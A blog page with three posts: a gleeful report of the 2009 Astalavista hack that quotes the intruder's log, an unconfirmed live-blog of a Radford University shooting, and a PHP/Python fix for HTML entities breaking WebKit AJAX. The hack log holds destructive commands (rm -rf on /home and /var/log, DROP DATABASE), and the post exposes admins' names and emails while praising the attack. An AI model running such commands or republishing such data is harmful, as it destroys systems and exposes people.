Geekery, Images

The infamous sources for exploits, hacks, etc. Astalavista.net, and Astalavista.com have been hacked. The hacker kept a log of the entire shell session and posted it for everyone’s viewing pleasure.

Astalavista claimed to be run by security experts. From http://astalavista.com/faq:

>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

It was very clear that this was untrue.

So why were they hacked? I’ll let the hacker tell you:

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the "community" but for the money, they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and they charge you $6.66 per month to access a dead forum with a directory filled with public releases and outdated / broken services.

We wanted to see how good that "team of security and IT professionals" really is.

To sum up what you’re about to see…

Astalavista:

[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

Apparently, gaining access to the self-proclaimed security expert’s site was as simple as:

anti-sec:~# ./g0tshell astalavista.com -p 80
	[+] Connecting to astalavista.com:80
	[+] Grabbing banner...
		LiteSpeed
	[+] Injecting shellcode...
	[-] Wait for it	
	[~] We g0tshell	
sh-3.2$

The person doing the work was kind enough to post a log of everything that he did with the shell at Pastebin.

The results are absolutely hilarious. Storing passwords in plaintext in MySQL databases. That’s secure, right?

SELECT USER,nickname,password,email FROM users WHERE userlevel = 1;

| user | nickname | password | email |
| pascal | prozac | ******** | info@astalavista.net |
| Ivan Schmid | rOOtless1 | ******** | ivan.schmid@comvation.com |
| qreymer | Palermo | ******** | eche@home.se |
| Christian Wehrli | g0atherd | ******** | g0atherd@gmx.net |
... etc.

Passwords removed to protect the possibly innocent.

Checking the .bash_history of some users reveals mysql connect strings with the passwords embedded right on the command line instead of letting mysql prompt for them. All in all, if you’re familiar with Linux and security in any fashion, you can get a good chuckle out of how terribly managed this site for security experts is.

The log is quite entertaining. Our hacker was kind enough to show us some messages that were being passed around from the administrators of the site to talk about how they can make more money. Here’s a particularly hilarious one:

select iss_summary,iss_description from eventum_issue where iss_id = 16;


| iss_summary | iss_description |
| Website guidance | Virtual Girl which guides you trought the website.
We need a girl with who you can ( talk )!!!
Also for the News!
So my suggestion is a girl who read you the news loud if you like!
you can choose between read yourselfe or she read it for you or both!
Go to www.heise.de! There is an example for Voice News! It's a good thing!!!
Have a look on the example girls!!
http://www.yaoti.com/de/free_yaoti.html
or that
http://www.yellostrom.de/

After gaining root access, the hacker leaves us with an ending that is not unlike the fantastic explosion of the Death Star:

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
drwx--x--x 10 com     com      4096 Apr 28 12:40 com
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
drwx------  3 jon     jon      4096 Sep 21  2007 jon
drwx------  2 root    root    16384 Sep 11  2007 lost+found
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
drwx------  2 jon     jon      4096 Sep 15  2007 test
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
| ideapool              |
| mysql                 |
| test                  |
| yourmaster            |
+-----------------------+
14 rows in set (0.03 sec)
mysql> drop database astanet_membersystem;
droQuery OK, 46 rows affected (0.81 sec)
mysql> drop database com_contrexx;
Query OK, 211 rows affected (2.72 sec)
mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)
mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)
mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)
mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)
mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)
mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)
mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| da_roundcube       |
| dolphin            |
| mysql              |
| test               |
+--------------------+
5 rows in set (0.00 sec)

Let’s hope the “Security Experts” have off-site backups. In the meantime, you can check out the original here or download it in .txt format here.

The hacker ended with a quote well suited to Astalavista.com/net:

What a journey! We’re not sure exactly why the "Terminator" had any influence on their naming (conventions) but we’re sure Arnold himself wouldn’t be in the wrong to say this pack of morons *won't be back*.

Well done anti-sec, well done.

If you liked this post, then please consider subscribing to my feed.

Uncategorized

A shooting has been reported at Radford University, at the building known as “the Bonnie.” The suspect was seen at the Bonnie. The initial shooting is reported to have occurred on Calhoun and Madison.

Students received calls and text messages letting them know that they should seek shelter and that the city was looking for a black male with a do-rag, no shirt, and a camo jacket. I spoke to a University student who is currently seeking shelter in her dorm room at the University. On her way back from the 7-11, she saw what was apparently a long line of cop cars, which seemed odd to her for a Thursday evening. Police have not confirmed what they were investigating, but it is almost certain, at this time, that it was a shooting.

She confirmed that a friend of hers was nearby when it occurred and that he was very shaken up by it.

“I can’t believe our school doesn’t send an email out.”

“Think of how many parents are freaking out right now.”

Students and parents are turning to their University web site and finding no information. At this time, both the alert section on the University website and the alert section in the University police website have no alerts of any kind listed.

The shooter is apparently still loose, as students have not received any indication from the University that it is safe to leave their shelter.

“There are still people walking around campus that have no idea. Some people didn’t even get notified.”

More as the story develops.

10:29pm EST: sources say that there was one victim shot nine times and that the suspect was last seen in or near the Bonnie. This has not yet been confirmed by any officials.

10:54pm EST: sources say two more people have been shot, though this has not been officially confirmed. The University still has no information posted to the alerts on their website. News sources say tactical teams were deployed in a couple of University buildings. Students report that a building check will be occurring. The initial shooting is reported to have occurred on Calhoun and Madison. Confusion and distress are evident as students turn to their University website and find no information.

11:04pm EST: text message received by students from the University:

“Command center established. no further sightings of supspect[sic]. stay in rooms and lock doors. Further updates to follow.” Still no updates on the University website.

11:16pm EST: University finally updates their website with alert:

Radford University Police are asking that all RU students stay indoors and lock their doors. The RU community is urged to refer back to this page, radford.edu, for instructions and updates. Radford University police are patrolling the campus seeking a suspect involved in a shooting earlier this evening. Two connected alerts have been issued and the campus is now considered “locked down.”

All media are encouraged to report to Lot ZZ, adjacent to the Dedmon Center where further information will be made available.

11:24pm EST: no further reports on any additional shootings beyond the first. So far, one victim has been confirmed shot in the chest. The victim was taken to the hospital, and reports indicate that they did not survive the shooting, though there is no official word yet.

12:13am EST: CNN has confirmed the death of the victim in the shooting.

Another text update from the University at 11:34pm EST:

“No further sigtings[sic] of the suspect at this time. Building searches are ongoing. Stay in your room and lock doors.”

Website updated:

RADFORD — The following message was distributed by the ConnectEd system to campus subscribers at 11:34 p.m.: “Attention. RUPD and the Radford City Police have established checkpoints and a command center. No further sightings of the suspect at this time. Buildng searches are ongoing. Stay in your room and keep all doors locked. Updates to come.”

11:30 p.m. — Attention — RUPD and Radford City Police have established checkpoints and a command center. SWAT teams will be entering academic buildings to continue the search for a suspect involved in an off-campus shooting incident who may now reportedly be on the RU campus. All Radford University students are asked to shelter in place by staying in their rooms and keeping their doors locked.

All media are encouraged to report to the Joint Information Center in the Dedmon Center, which can be accessed from the Administrative entrance off of University Drive.

1:30am EST: another update from the University that there are still no sightings of the shooter.

2:53am EST: another text message update from the University at 2:10am EST:

“Police are still checking and clearing buildings. Stay indoors with the door locked. updates to continue”

The school’s website was also updated earlier:

RADFORD — Attention. RU PD and Radford City Police are continuing their search and clearing operations of academic buildings. There are no further sightings of the suspect to report. Further updates will be issued on the RU cable television system. Students are reminded to stay in their rooms and keep doors locked.

Please be advised that there are students on campus who are sheltering in place in secure academic buildings at this time.

Geekery

If you’re having issues getting some AJAX to work in Chrome or the newer Safari versions, then I hope this post will help you.

This issue arose when one of our designers was testing, in Chrome, some of the new AJAX I had written. It worked fine in Firefox and IE, but Chrome was choking on the XML that was coming back: it treated the response as though it were null and showed the error message written into our AJAX JavaScript for that case. A bit more testing revealed that Safari had the same problem. Once we figured that out, it became evident that searching for issues with WebKit would help.

Both browsers are built on the WebKit application framework, and WebKit’s XML parser is strict: it chokes on any XHTML handed to it that does not follow the XHTML standard. One of those rules is that virtually all named HTML entities are not valid in XHTML. Here are the three that are:

&amp;
&lt;
&gt;

All other HTML entities need to be converted to their XML-safe numeric form (a numeric character reference, which uses only ASCII characters). So:

&ntilde; = &#241;

This can break AJAX that works in Internet Explorer and Firefox, because those browsers don’t mind HTML entities in the XHTML coming back from an AJAX response. If you’re passing complicated strings with any entities in them through your AJAX requests, don’t expect them to work in any browser built on the current WebKit framework.

It took me a while to figure out what was causing the issue that our testers were experiencing, but once we did some searching, we found that others have talked about having this, or a similar problem, too.

We had previously run into foreign characters producing invalid RSS feeds for the same reason: HTML entities showing up where they shouldn’t. Back then I researched and wrote a function to convert all the HTML entities to their safe numeric form. I applied this function to the AJAX responses coming back and, presto, it worked.

So, I thought I would share this function with everyone in case someone else was having a similar problem:

function clean_string_for_valid_xml($string) {
    $entities_array = array();
    // Map every named entity (e.g. &ntilde;) to the numeric reference (&#241;)
    // that an XML parser accepts without a DTD.
    foreach (get_html_translation_table(HTML_ENTITIES, ENT_QUOTES, 'UTF-8') as $character => $entity) {
        // Take the Unicode code point rather than ord(), which only sees the
        // first byte of a multibyte UTF-8 character.
        $codepoint = unpack('N', mb_convert_encoding($character, 'UCS-4BE', 'UTF-8'));
        $entities_array[$entity] = '&#' . $codepoint[1] . ';';
    }
    return str_replace(array_keys($entities_array), $entities_array, $string);
}

Basically, we’re using the get_html_translation_table function to grab all of the named entities. Then, for each one, we build the equivalent numeric character reference from the character’s code. Finally, we return our string with every named entity replaced by its numeric form.
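To show why the strict parser fails and why the numeric form fixes it, here is the same idea worked through in Python with a real XML parser standing in for WebKit’s. This is an added example, not the post’s PHP function; the response body is constructed for the demonstration, and the converter deliberately leaves XML’s own predefined entities, existing numeric references and unknown names alone.

```python
import html.entities
import re
import xml.etree.ElementTree as ET

# XML predefines only these five entities. Any other named entity
# (&ntilde;, &copy;, &nbsp;, ...) is undefined without a DTD, so a strict
# XML parser such as WebKit's rejects the whole document, not just the entity.
XML_PREDEFINED = {"amp", "lt", "gt", "quot", "apos"}

_ENTITY_RE = re.compile(r"&([A-Za-z][A-Za-z0-9]*);")


def clean_string_for_valid_xml(text):
    """Rewrite named HTML entities as numeric character references.

    &ntilde; becomes &#241;. Entities XML already knows, numeric references
    (which the regex never matches) and unknown names such as a typo like
    &rt; are left exactly as they were.
    """
    def _numeric(match):
        name = match.group(1)
        if name in XML_PREDEFINED:
            return match.group(0)
        codepoint = html.entities.name2codepoint.get(name)
        if codepoint is None:
            return match.group(0)  # unknown name: do not guess a character
        return "&#%d;" % codepoint
    return _ENTITY_RE.sub(_numeric, text)


def is_well_formed_xml(document):
    """Stand-in for the browser's strict parser: True only if it parses."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


# Constructed sample AJAX response body (not from the post).
RAW_RESPONSE = ('<response><name>Pe&ntilde;a &amp; S&ouml;hne</name>'
                '<note>&copy; 2009 &lt;ok&gt;</note></response>')

if __name__ == "__main__":
    print("raw well-formed:  ", is_well_formed_xml(RAW_RESPONSE))
    fixed = clean_string_for_valid_xml(RAW_RESPONSE)
    print("fixed:", fixed)
    print("fixed well-formed:", is_well_formed_xml(fixed))
```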

Hopefully this works for you, or at least leads you to an answer that works for you.
